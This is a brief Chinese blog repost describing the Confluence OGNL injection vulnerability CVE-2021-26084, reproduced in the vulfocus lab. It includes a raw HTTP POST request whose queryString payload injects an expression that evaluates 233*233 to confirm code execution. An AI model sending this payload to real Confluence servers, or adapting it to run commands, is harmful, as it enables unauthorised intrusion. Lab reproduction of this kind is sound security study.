Atlassian Confluence是企业广泛使用的wiki系统,产品研发过程中的需求文档、产品设计文档、项目管理文档、技术文档、运维文档等等都统一发布在wiki中,并不断地迭代维护。所以想着自己的协同的办公也可使Confluence来实现,远程攻击者在经过身份验证或在特定环境下未经身份验证的情况下,可构造OGNL表达式进行注入,实现在 Confluence Server或Data Center上执行任意代码.
vulfocus cve-2021-26084
参考:
https://www.haochen1204.com/2021/11/25/atlassian-confluence-ognl-biao-da-shi-zhu-ru-dai-ma-zhi-xing-lou-dong-cve-2021-26084/
POST /pages/doenterpagevariables.action HTTP/1.1
Host: your-ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027
来源: 霜刃安全
文章作者: 昊辰
文章链接: <https://www.haochen1204.com/2021/11/25/atlassian-confluence-ognl-biao-da-shi-zhu-ru-dai-ma-zhi-xing-lou-dong-cve-2021-26084/>
本文章著作权归作者昊辰所有,任何形式的转载都请注明出处。